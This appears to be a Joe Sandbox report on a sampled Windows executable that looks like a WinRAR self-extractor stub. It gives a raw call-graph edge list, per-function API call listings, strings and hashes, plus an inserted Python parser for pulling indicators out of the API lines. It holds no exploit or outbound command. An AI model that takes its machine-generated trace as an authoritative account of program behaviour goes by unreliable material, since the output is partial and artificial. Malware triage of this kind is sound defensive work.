24747->24764 24748 ba7537 24781 bb1a19 5 API calls ___delayLoadHelper2@8 24748->24781 24749 ba7450 24756 ba74c5 24749->24756 24759 ba74ee 24749->24759 24780 ba7f30 20 API calls _abort 24749->24780 24753 ba81f1 _abort 5 API calls 24758 ba74dd 24753->24758 24754 ba81f1 _abort 5 API calls 24754->24759 24756->24753 24756->24758 24758->24754 24761 ba752e 24759->24761 24760->24749 24782 baa441 LeaveCriticalSection 24761->24782 24763 ba7507 24763->24747 24763->24748 24783 baa836 24764->24783 24767 ba756b 24770 ba75c2 _abort 8 API calls 24767->24770 24768 ba754b GetPEB 
24768->24767 24769 ba755b GetCurrentProcess TerminateProcess 24768->24769 24769->24767 24771 ba7573 ExitProcess 24770->24771 24773 ba760f 24772->24773 24774 ba75ec GetProcAddress 24772->24774 24775 ba761e 24773->24775 24776 ba7615 FreeLibrary 24773->24776 24777 ba7601 24774->24777 24778 b9ec4a ___delayLoadHelper2@8 5 API calls 24775->24778 24776->24775 24777->24773 24779 ba7628 24778->24779 24779->24740 24780->24756 24782->24763 24784 baa85b 24783->24784 24785 baa851 24783->24785 24786 baa458 __dosmaperr 5 API calls 24784->24786 24787 b9ec4a ___delayLoadHelper2@8 5 API calls 24785->24787 24786->24785 24788 ba7547 24787->24788 24788->24767 24788->24768 24789 b810d5 24794 b85bd7 24789->24794 24795 b85be1 __EH_prolog 24794->24795 24796 b8b07d 82 API calls 24795->24796 24797 b85bed 24796->24797 24801 b85dcc GetCurrentProcess GetProcessAffinityMask 24797->24801 24836 b9eac0 27 API calls pre_c_initialization 24883 b997c0 10 API calls 24838 ba9ec0 21 API calls 24884 bab5c0 GetCommandLineA GetCommandLineW 24839 b9a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24885 baebc1 21 API calls __vsnwprintf_l 24840 b9a430 73 API calls 24890 b9be49 103 API calls 4 library calls 22982 b89f2f 22983 b89f3d 22982->22983 22984 b89f44 22982->22984 22985 b89f4a GetStdHandle 22984->22985 22989 b89f55 22984->22989 22985->22989 22986 b89fa9 WriteFile 22986->22989 22987 b89f7a 22988 b89f7c WriteFile 22987->22988 22987->22989 22988->22987 22988->22989 22989->22983 22989->22986 22989->22987 22989->22988 22991 b8a031 22989->22991 22993 b86e18 60 API calls 22989->22993 22994 b87061 75 API calls 22991->22994 22993->22989 22994->22983 24841 b81025 29 API calls pre_c_initialization 24894 baa918 27 API calls 3 library calls 24895 b9be49 108 API calls 4 library calls 22998 b9dc1f 22999 b9dbcd 22998->22999 23001 b9df59 22999->23001 23029 b9dc67 23001->23029 23003 b9df73 23004 b9dfd0 23003->23004 23007 b9dff4 23003->23007 23005 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23004->23005 23006 
b9dfdb RaiseException 23005->23006 23008 b9e1c9 23006->23008 23009 b9e06c LoadLibraryExA 23007->23009 23011 b9e0cd 23007->23011 23018 b9e0df 23007->23018 23024 b9e19b 23007->23024 23010 b9ec4a ___delayLoadHelper2@8 5 API calls 23008->23010 23009->23011 23012 b9e07f GetLastError 23009->23012 23013 b9e1d8 23010->23013 23014 b9e0d8 FreeLibrary 23011->23014 23011->23018 23015 b9e0a8 23012->23015 23016 b9e092 23012->23016 23013->22999 23014->23018 23019 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23015->23019 23016->23011 23016->23015 23017 b9e13d GetProcAddress 23020 b9e14d GetLastError 23017->23020 23017->23024 23018->23017 23018->23024 23021 b9e0b3 RaiseException 23019->23021 23022 b9e160 23020->23022 23021->23008 23022->23024 23025 b9ded7 DloadReleaseSectionWriteAccess 11 API calls 23022->23025 23040 b9ded7 23024->23040 23026 b9e181 RaiseException 23025->23026 23027 b9dc67 ___delayLoadHelper2@8 11 API calls 23026->23027 23028 b9e198 23027->23028 23028->23024 23030 b9dc99 23029->23030 23031 b9dc73 23029->23031 23030->23003 23048 b9dd15 23031->23048 23034 b9dc94 23058 b9dc9a 23034->23058 23037 b9ec4a ___delayLoadHelper2@8 5 API calls 23038 b9df55 23037->23038 23038->23003 23039 b9df24 23039->23037 23041 b9dee9 23040->23041 23042 b9df0b 23040->23042 23043 b9dd15 DloadLock 8 API calls 23041->23043 23042->23008 23044 b9deee 23043->23044 23045 b9df06 23044->23045 23047 b9de67 DloadProtectSection 3 API calls 23044->23047 23067 b9df0f 8 API calls 2 library calls 23045->23067 23047->23045 23049 b9dc9a DloadUnlock 3 API calls 23048->23049 23050 b9dd2a 23049->23050 23051 b9ec4a ___delayLoadHelper2@8 5 API calls 23050->23051 23052 b9dc78 23051->23052 23052->23034 23053 b9de67 23052->23053 23054 b9de7c DloadObtainSection 23053->23054 23055 b9de82 23054->23055 23056 b9deb7 VirtualProtect 23054->23056 23066 b9dd72 VirtualQuery GetSystemInfo 23054->23066 23055->23034 23056->23055 23059 b9dcab 23058->23059 23060 b9dca7 23058->23060 23061 b9dcaf 23059->23061 23062 b9dcb3 
GetModuleHandleW 23059->23062 23060->23039 23061->23039 23063 b9dcc9 GetProcAddress 23062->23063 23065 b9dcc5 23062->23065 23064 b9dcd9 GetProcAddress 23063->23064 23063->23065 23064->23065 23065->23039 23066->23056 23067->23042 24896 b86110 80 API calls 24897 bab710 GetProcessHeap 24842 b9ec0b 28 API calls 2 library calls 24899 b9db0b 19 API calls ___delayLoadHelper2@8 23077 b9c40e 23078 b9c4c7 23077->23078 23085 b9c42c _wcschr 23077->23085 23079 b9c4e5 23078->23079 23092 b9be49 _wcsrchr 23078->23092 23132 b9ce22 23078->23132 23082 b9ce22 18 API calls 23079->23082 23079->23092 23082->23092 23083 b9ca8d 23085->23078 23086 b917ac CompareStringW 23085->23086 23086->23085 23087 b9c11d SetWindowTextW 23087->23092 23092->23083 23092->23087 23093 b9bf0b SetFileAttributesW 23092->23093 23099 b9c2e7 GetDlgItem SetWindowTextW SendMessageW 23092->23099 23101 b9c327 SendMessageW 23092->23101 23106 b917ac CompareStringW 23092->23106 23107 b9aa36 23092->23107 23111 b99da4 GetCurrentDirectoryW 23092->23111 23116 b8a52a 7 API calls 23092->23116 23117 b8a4b3 FindClose 23092->23117 23118 b9ab9a 76 API calls new 23092->23118 23119 ba35de 23092->23119 23094 b9bfc5 GetFileAttributesW 23093->23094 23095 b9bf25 ___scrt_fastfail 23093->23095 23094->23092 23098 b9bfd7 DeleteFileW 23094->23098 23095->23092 23095->23094 23112 b8b4f7 52 API calls 2 library calls 23095->23112 23098->23092 23103 b9bfe8 23098->23103 23099->23092 23101->23092 23113 b8400a 23103->23113 23104 b9c01d MoveFileW 23104->23092 23105 b9c035 MoveFileExW 23104->23105 23105->23092 23106->23092 23108 b9aa40 23107->23108 23109 b9aaf3 ExpandEnvironmentStringsW 23108->23109 23110 b9ab16 23108->23110 23109->23110 23110->23092 23111->23092 23112->23095 23155 b83fdd 23113->23155 23116->23092 23117->23092 23118->23092 23120 ba8606 23119->23120 23121 ba861e 23120->23121 23122 ba8613 23120->23122 23124 ba8626 23121->23124 23130 ba862f __dosmaperr 23121->23130 23227 ba8518 23122->23227 23125 ba84de _free 20 API calls 23124->23125 
23129 ba861b 23125->23129 23126 ba8659 HeapReAlloc 23126->23129 23126->23130 23127 ba8634 23234 ba895a 20 API calls __dosmaperr 23127->23234 23129->23092 23130->23126 23130->23127 23235 ba71ad 7 API calls 2 library calls 23130->23235 23133 b9ce2c ___scrt_fastfail 23132->23133 23134 b9cf1b 23133->23134 23140 b9d08a 23133->23140 23241 b917ac CompareStringW 23133->23241 23238 b8a180 23134->23238 23138 b9cf4f ShellExecuteExW 23138->23140 23144 b9cf62 23138->23144 23140->23079 23141 b9cf47 23141->23138 23142 b9cf9b 23243 b9d2e6 6 API calls 23142->23243 23143 b9cff1 CloseHandle 23145 b9cfff 23143->23145 23146 b9d00a 23143->23146 23144->23142 23144->23143 23148 b9cf91 ShowWindow 23144->23148 23244 b917ac CompareStringW 23145->23244 23146->23140 23151 b9d081 ShowWindow 23146->23151 23148->23142 23150 b9cfb3 23150->23143 23152 b9cfc6 GetExitCodeProcess 23150->23152 23151->23140 23152->23143 23153 b9cfd9 23152->23153 23153->23143 23156 b83ff4 ___scrt_initialize_default_local_stdio_options 23155->23156 23159 ba5759 23156->23159 23162 ba3837 23159->23162 23163 ba385f 23162->23163 23164 ba3877 23162->23164 23179 ba895a 20 API calls __dosmaperr 23163->23179 23164->23163 23166 ba387f 23164->23166 23181 ba3dd6 23166->23181 23167 ba3864 23180 ba8839 26 API calls ___std_exception_copy 23167->23180 23171 ba386f 23172 b9ec4a ___delayLoadHelper2@8 5 API calls 23171->23172 23174 b83ffe GetFileAttributesW 23172->23174 23174->23103 23174->23104 23175 ba3907 23190 ba4186 51 API calls 3 library calls 23175->23190 23178 ba3912 23191 ba3e59 20 API calls _free 23178->23191 23179->23167 23180->23171 23182 ba3df3 23181->23182 23183 ba388f 23181->23183 23182->23183 23192 ba8fa5 GetLastError 23182->23192 23189 ba3da1 20 API calls 2 library calls 23183->23189 23185 ba3e14 23213 ba90fa 38 API calls __fassign 23185->23213 23187 ba3e2d 23214 ba9127 38 API calls __fassign 23187->23214 23189->23175 23190->23178 23191->23171 23193 ba8fbb 23192->23193 23194 ba8fc7 23192->23194 23215 baa61b 11 API calls 2 
library calls 23193->23215 23216 ba85a9 20 API calls 2 library calls 23194->23216 23197 ba8fc1 23197->23194 23199 ba9010 SetLastError 23197->23199 23198 ba8fd3 23204 ba8fdb 23198->23204 23223 baa671 11 API calls 2 library calls 23198->23223 23199->23185 23201 ba8ff0 23203 ba8ff7 23201->23203 23201->23204 23224 ba8e16 20 API calls __dosmaperr 23203->23224 23217 ba84de 23204->23217 23205 ba8fe1 23207 ba901c SetLastError 23205->23207 23225 ba8566 38 API calls _abort 23207->23225 23208 ba9002 23210 ba84de _free 20 API calls 23208->23210 23212 ba9009 23210->23212 23212->23199 23212->23207 23213->23187 23214->23183 23215->23197 23216->23198 23218 ba84e9 RtlFreeHeap 23217->23218 23222 ba8512 __dosmaperr 23217->23222 23219 ba84fe 23218->23219 23218->23222 23226 ba895a 20 API calls __dosmaperr 23219->23226 23221 ba8504 GetLastError 23221->23222 23222->23205 23223->23201 23224->23208 23226->23221 23228 ba8556 23227->23228 23232 ba8526 __dosmaperr 23227->23232 23237 ba895a 20 API calls __dosmaperr 23228->23237 23230 ba8541 RtlAllocateHeap 23231 ba8554 23230->23231 23230->23232 23231->23129 23232->23228 23232->23230 23236 ba71ad 7 API calls 2 library calls 23232->23236 23234->23129 23235->23130 23236->23232 23237->23231 23245 b8a194 23238->23245 23241->23134 23242 b8b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23242->23141 23243->23150 23244->23146 23253 b9e360 23245->23253 23248 b8a189 23248->23138 23248->23242 23249 b8a1b2 23255 b8b66c 23249->23255 23251 b8a1c6 23251->23248 23252 b8a1ca GetFileAttributesW 23251->23252 23252->23248 23254 b8a1a1 GetFileAttributesW 23253->23254 23254->23248 23254->23249 23256 b8b679 23255->23256 23264 b8b683 23256->23264 23265 b8b806 CharUpperW 23256->23265 23258 b8b692 23266 b8b832 CharUpperW 23258->23266 23260 b8b6a1 23261 b8b71c GetCurrentDirectoryW 23260->23261 23262 b8b6a5 23260->23262 23261->23264 23267 b8b806 CharUpperW 23262->23267 23264->23251 23265->23258 23266->23260 23267->23264 24843 b9ea00 46 API calls 6 
library calls 24900 b81f05 126 API calls __EH_prolog 23282 b9d573 23283 b9d580 23282->23283 23290 b8ddd1 23283->23290 23286 b8400a _swprintf 51 API calls 23287 b9d5a6 SetDlgItemTextW 23286->23287 23293 b9ac74 PeekMessageW 23287->23293 23298 b8ddff 23290->23298 23294 b9acc8 23293->23294 23295 b9ac8f GetMessageW 23293->23295 23296 b9aca5 IsDialogMessageW 23295->23296 23297 b9acb4 TranslateMessage DispatchMessageW 23295->23297 23296->23294 23296->23297 23297->23294 23304 b8d28a 23298->23304 23301 b8ddfc 23301->23286 23302 b8de22 LoadStringW 23302->23301 23303 b8de39 LoadStringW 23302->23303 23303->23301 23309 b8d1c3 23304->23309 23306 b8d2a7 23307 b8d2bc 23306->23307 23317 b8d2c8 26 API calls 23306->23317 23307->23301 23307->23302 23310 b8d1de 23309->23310 23316 b8d1d7 _strncpy 23309->23316 23312 b8d202 23310->23312 23318 b91596 WideCharToMultiByte 23310->23318 23315 b8d233 23312->23315 23319 b8dd6b 50 API calls __vsnprintf 23312->23319 23320 ba58d9 26 API calls 3 library calls 23315->23320 23316->23306 23317->23307 23318->23312 23319->23315 23320->23316 24846 b81075 82 API calls pre_c_initialization 24847 b95c77 121 API calls __vswprintf_c_l 24851 b9fc60 51 API calls 2 library calls 24853 ba3460 RtlUnwind 24854 ba9c60 71 API calls _free 24855 ba9e60 31 API calls 2 library calls 24194 b89b59 24197 b89bd7 24194->24197 24198 b89b63 24194->24198 24195 b89bad SetFilePointer 24196 b89bcd GetLastError 24195->24196 24195->24197 24196->24197 24198->24195 24902 b99b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24857 ba8050 8 API calls ___vcrt_uninitialize 24904 b9d34e DialogBoxParamW 24905 b9be49 98 API calls 3 library calls 24858 b9ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24859 b98c40 GetClientRect 24860 ba3040 5 API calls 2 library calls 24861 bb0040 IsProcessorFeaturePresent

              Control-flow Graph

              APIs
                • Part of subcall function 00B900CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00B900E4
                • Part of subcall function 00B900CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B900F6
                • Part of subcall function 00B900CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B90127
                • Part of subcall function 00B99DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B99DAC
                • Part of subcall function 00B9A335: OleInitialize.OLE32(00000000), ref: 00B9A34E
                • Part of subcall function 00B9A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B9A385
                • Part of subcall function 00B9A335: SHGetMalloc.SHELL32(00BC8430), ref: 00B9A38F
                • Part of subcall function 00B913B3: GetCPInfo.KERNEL32(00000000,?), ref: 00B913C4
                • Part of subcall function 00B913B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00B913D8
              • GetCommandLineW.KERNEL32 ref: 00B9D61C
              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B9D643
              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B9D654
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00B9D68E
                • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9D29D
                • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9D2D9
              • CloseHandle.KERNEL32(00000000), ref: 00B9D697
              • GetModuleFileNameW.KERNEL32(00000000,00BDDC90,00000800), ref: 00B9D6B2
              • SetEnvironmentVariableW.KERNEL32(sfxname,00BDDC90), ref: 00B9D6BE
              • GetLocalTime.KERNEL32(?), ref: 00B9D6C9
              • _swprintf.LIBCMT ref: 00B9D708
              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B9D71A
              • GetModuleHandleW.KERNEL32(00000000), ref: 00B9D721
              • LoadIconW.USER32(00000000,00000064), ref: 00B9D738
              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00B9D789
              • Sleep.KERNEL32(?), ref: 00B9D7B7
              • DeleteObject.GDI32 ref: 00B9D7F0
              • DeleteObject.GDI32(?), ref: 00B9D800
              • CloseHandle.KERNEL32 ref: 00B9D843
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
              • API String ID: 788466649-433059772
              • Opcode ID: fd6ce0a7961805582f2a36be83f7f1c5d245a6ab07ccbca9fb61503ed7034783
              • Instruction ID: a50441ce42355af4d83db89390a7cc6052e00abcdcc1035c7c8ddd70e2f0cd1a
              • Opcode Fuzzy Hash: fd6ce0a7961805582f2a36be83f7f1c5d245a6ab07ccbca9fb61503ed7034783
              • Instruction Fuzzy Hash: 7961D371904341AFDB20BB65DC89F2A7BECEB48741F0005BAF549972A2EFB4D904C7A1
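Turning the call lists in these function blocks into structured records makes the SFX stub's indicators (the environment variables it sets, the file-mapping name it opens, the export names it resolves) easy to pull out programmatically instead of reading them off the page. The parser below is an added example, not code from the report or from Joe Sandbox. Its sample input is constructed from API lines shown in this report, and the regex assumes the exact `Name.MODULE(args), ref: address` layout of those lines, including the indented `Part of subcall function CALLER:` form.

```python
"""Parse the per-call lines of a Joe Sandbox function report into records.

Added example; not code from the report or from Joe Sandbox. It targets the
line layout used in the "APIs" blocks of this page:
    • Name.MODULE(arg,arg,...), ref: ADDRESS
    • Part of subcall function CALLER: Name.MODULE(...), ref: ADDRESS
Calls without an argument list ("GetCommandLineW.KERNEL32 ref: ...") are accepted too.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Sample input constructed from "APIs" lines that appear in the report.
SAMPLE_LINES = """\
• GetCommandLineW.KERNEL32 ref: 00B9D61C
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B9D643
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B9D654
  • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B9D29D
  • Part of subcall function 00B9D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B9D2D9
• SetEnvironmentVariableW.KERNEL32(sfxname,00BDDC90), ref: 00B9D6BE
• _swprintf.LIBCMT ref: 00B9D708
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B9D71A
• GetModuleHandleW.KERNEL32(kernel32), ref: 00B900E4
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B900F6
• CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00B904E7
• Sleep.KERNEL32(00002710), ref: 00B9065B
"""

# One report line: optional subcall prefix, Name.MODULE, optional (args), ref: address.
_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# A raw operand is eight hex digits, optionally negative; "?" marks an unknown value.
_RAW = re.compile(r"^-?[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str] = field(default_factory=list)
    ref: str = ""
    caller: str | None = None  # set for "Part of subcall function" lines

    def literal_args(self) -> list[str]:
        """Operands that are neither raw values nor unknown: the strings worth triaging."""
        return [a for a in self.args if a != "?" and not _RAW.match(a)]


def parse_api_lines(text: str) -> list[ApiCall]:
    """Return one ApiCall per matching line; headers such as "APIs" are skipped."""
    calls: list[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m["args"]
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["caller"]))
    return calls


def env_vars_set(calls: list[ApiCall]) -> set[str]:
    """Variable names passed as the first operand to SetEnvironmentVariableW."""
    return {c.args[0] for c in calls
            if c.name == "SetEnvironmentVariableW" and c.args and c.args[0] != "?"}


def literal_strings(calls: list[ApiCall]) -> set[str]:
    """Every string operand in the block: mapping names, DLL names, export names."""
    return {s for c in calls for s in c.literal_args()}


def subcalls_of(calls: list[ApiCall], caller: str) -> list[ApiCall]:
    """Calls the report attributes to a given subcall function address."""
    return [c for c in calls if c.caller and c.caller.upper() == caller.upper()]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_LINES)
    print(f"{len(parsed)} calls; env vars set: {sorted(env_vars_set(parsed))}")
    print("string operands:", sorted(literal_strings(parsed)))
```

On the sample above the parser recovers the four `sfx*` environment variables and the `winrarsfxmappingfile.tmp` mapping name, which together identify the WinRAR SFX stub; the same functions can be run over every "APIs" block of a report by concatenating the blocks.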

              Control-flow Graph (function at b99e1c; the rendered graph with its executed/not-executed colouring is not recoverable in text, so the edge list is omitted and the API calls on its paths are those listed under APIs below)
              APIs
              • FindResourceW.KERNEL32(00B9AE4D,PNG,?,?,?,00B9AE4D,00000066), ref: 00B99E2E
              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E46
              • LoadResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E59
              • LockResource.KERNEL32(00000000,?,?,?,00B9AE4D,00000066), ref: 00B99E64
              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B9AE4D,00000066), ref: 00B99E82
              • GlobalLock.KERNEL32(00000000), ref: 00B99E93
              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B99EB7
              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B99EFC
              • GlobalUnlock.KERNEL32(00000000), ref: 00B99F1B
              • GlobalFree.KERNEL32(00000000), ref: 00B99F22
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
              • String ID: PNG
              • API String ID: 3656887471-364855578
              • Opcode ID: b50f11409e9683350965ba1934ef46ef7ff8915273ac4b0d64b035c3328ef9d7
              • Instruction ID: 81c4c79f7e09c9ab99d617e7bf9bedc8c43115fcf4fd8fc25dda9741a7dad816
              • Opcode Fuzzy Hash: b50f11409e9683350965ba1934ef46ef7ff8915273ac4b0d64b035c3328ef9d7
              • Instruction Fuzzy Hash: 7B316F71604706ABDB109F29DC48E2BBBEDFF89B51B04466CF906E3260DF71EC008A61

              Control-flow Graph (function at b8a5f4; the rendered graph with its executed/not-executed colouring is not recoverable in text, so the edge list is omitted and the API calls on its paths are those listed under APIs below)
              APIs
              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A628
              • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A65E
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A66A
              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A692
              • GetLastError.KERNEL32(?,?,?,?,00B8A4EF,000000FF,?,?), ref: 00B8A69E
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: FileFind$ErrorFirstLast$Next
              • String ID:
              • API String ID: 869497890-0
              • Opcode ID: 9f6811cbc6a0a40070431e47cf28347b5ffe66b87b476c1b003dfeeef5cc9a34
              • Instruction ID: ab10d729abb08382f9c000fc7b214ceeb916f6baf922428b3f5645ab97d7b9ee
              • Opcode Fuzzy Hash: 9f6811cbc6a0a40070431e47cf28347b5ffe66b87b476c1b003dfeeef5cc9a34
              • Instruction Fuzzy Hash: 42418F76504645AFC720FF68C884ADAF7E8FF48340F040A6AF5A9D3250E774A954CB92
              APIs
              • GetCurrentProcess.KERNEL32(00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002,00000000), ref: 00BA755E
              • TerminateProcess.KERNEL32(00000000,?,00BA7513,00000000,00BBBAD8,0000000C,00BA766A,00000000,00000002,00000000), ref: 00BA7565
              • ExitProcess.KERNEL32 ref: 00BA7577
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: c1e9c25d18550ddb377cfafe608b7a77f714bd07b999944a26f72f8ac9822c9c
              • Instruction ID: 56d7704cf636e1fddda20081ed1c8705d755b7d655ebf5998c3923d4781b13c3
              • Opcode Fuzzy Hash: c1e9c25d18550ddb377cfafe608b7a77f714bd07b999944a26f72f8ac9822c9c
              • Instruction Fuzzy Hash: 17E04631448508AFCF11BF28CD08A483BA9EF12B41F448154F8058B222CF75DE42CB50
              APIs
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID:
              • API String ID: 3004599000-0
              • Opcode ID: 93b6510a01759ce8319109e3f0d2dbc81ecb8973ff657455fb4aeaf009b877d3
              • Instruction ID: eb7b2df874b064a76aa0c42570f229963c4b44dd6a8fb2c3c7afeaa1fb3e46ad
              • Opcode Fuzzy Hash: 93b6510a01759ce8319109e3f0d2dbc81ecb8973ff657455fb4aeaf009b877d3
              • Instruction Fuzzy Hash: E282F870904245AFDF25FF64C885BFABBE9EF05300F4841FAE959AB162DB315A44CB60
              APIs
              • __EH_prolog.LIBCMT ref: 00B9AEE5
                • Part of subcall function 00B8130B: GetDlgItem.USER32(00000000,00003021), ref: 00B8134F
                • Part of subcall function 00B8130B: SetWindowTextW.USER32(00000000,00BB35B4), ref: 00B81365
              Strings
              Memory Dump Source
